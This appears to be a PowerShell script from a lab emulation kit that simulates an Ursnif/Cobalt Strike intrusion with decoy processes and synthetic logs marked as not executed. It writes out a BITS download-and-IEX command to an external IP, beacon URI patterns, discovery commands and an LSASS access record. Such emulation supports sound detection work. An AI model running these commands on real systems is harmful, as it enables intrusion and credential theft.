#Requires -Version 5.1
#Requires -RunAsAdministrator
[CmdletBinding()]param([switch]$LabConfirmed)
. "$PSScriptRoot\UrsnifGiftSim-utilities.ps1";Assert-UrsnifGiftSafety -LabConfirmed:$LabConfirmed;$p=Initialize-UrsnifGiftEnvironment
$powershell=Join-Path $p.Payloads 'powershell.exe';New-UrsnifGiftDecoy $powershell 'BITS/Cobalt PowerShell stand-in';Invoke-UrsnifGiftDecoy $powershell "powershell.exe -nop -c start-job { Import-Module BitsTransfer; Start-BitsTransfer -Source 'http://193.201.9.199:80/a' -Destination %TEMP%\random; IEX content }" 'cmd.exe'
Write-UrsnifGiftFile(Join-Path $p.Logs 'BITS-Client-Operational.jsonl')(@{event='BITS transfer';source='http://193.201.9.199:80/a';destination='%TEMP%\random';jobCreated=$false;bytesTransferred=0;synthetic=$true}|ConvertTo-Json -Compress)'BITS event canary'
$beacon=Join-Path $p.Payloads 'beacon.exe';New-UrsnifGiftDecoy $beacon 'Cobalt Strike HTTPS beacon stand-in';Invoke-UrsnifGiftDecoy $beacon 'Cobalt Strike HTTPS beacon GET /__utm.gif POST /submit.php sleep 60000' 'powershell.exe';Invoke-UrsnifGiftLoopback 443 '193.201.9.199:443 Cobalt Strike' 'HTTPS marker'
$manual=@('whoami','whoami /groups','time','ipconfig /all','systeminfo','net user SUPPORT-ADMIN');foreach($c in $manual){Invoke-UrsnifGiftDecoy $powershell $c 'beacon.exe';Add-UrsnifGiftManifest discovery-command 'generated-commandline-only' represented @{reportedCommandLine=$c;executedDiscovery=$false}}
Write-UrsnifGiftFile(Join-Path $p.Payloads 'adcomp.bat')'@REM INERT. Reported: powershell Get-ADComputer -Filter * -Properties Name,OperatingSystem,OperatingSystemVersion,OperatingSystemServicePack,IPv4Address >> log2.txt''domain discovery canary'
Invoke-UrsnifGiftDecoy $powershell 'cmd.exe /C adcomp.bat -> powershell Get-ADComputer -Filter * >> log2.txt' 'beacon.exe';Write-UrsnifGiftFile(Join-Path $p.Staging 'log2.txt')"GENERATED COMPUTER INVENTORY`nLAB-DC01`nLAB-BACKUP01`nNo directory query occurred."'generated AD output canary'
Add-UrsnifGiftJsonLine(Join-Path $p.Logs 'Sysmon-ProcessAccess.jsonl')@{eventId=10;sourceImage='C:\Windows\System32\rundll32.exe';targetImage='C:\Windows\System32\lsass.exe';grantedAccess='0x1010';accessAttempted=$false;credentialsRead=$false;synthetic=$true}'LSASS access evidence canary'
Write-UrsnifGiftFile(Join-Path $p.Evidence 'credential-injection-negative-record.json')(@{reportedProcessInjectionTargets=@('explorer.exe','rundll32.exe');processesInjected=0;LSASSHandlesOpened=0;LSASSMemoryRead=$false;credentialsCollected=0;passwordStoresAccessed=$false}|ConvertTo-Json)'credential safety record'
Add-UrsnifGiftTimeline 96 execution 'Hands-on BITS job and in-memory Cobalt Strike transition represented' @{BITSJobsCreated=0;downloads=0;beaconExecuted=$false;technique='T1197'};Add-UrsnifGiftTimeline 96.2 discovery 'Manual host/user discovery and adcomp.bat domain-computer query represented' @{realQueriesExecuted=0;techniques=@('T1033','T1124','T1082','T1087.002','T1018')};Add-UrsnifGiftTimeline 96.4 credential-access 'Cobalt process injection and LSASS GrantedAccess 0x1010 evidence represented' @{processesInjected=0;LSASSAccessed=$false;techniques=@('T1055','T1055.004','T1003.001','T1555')}
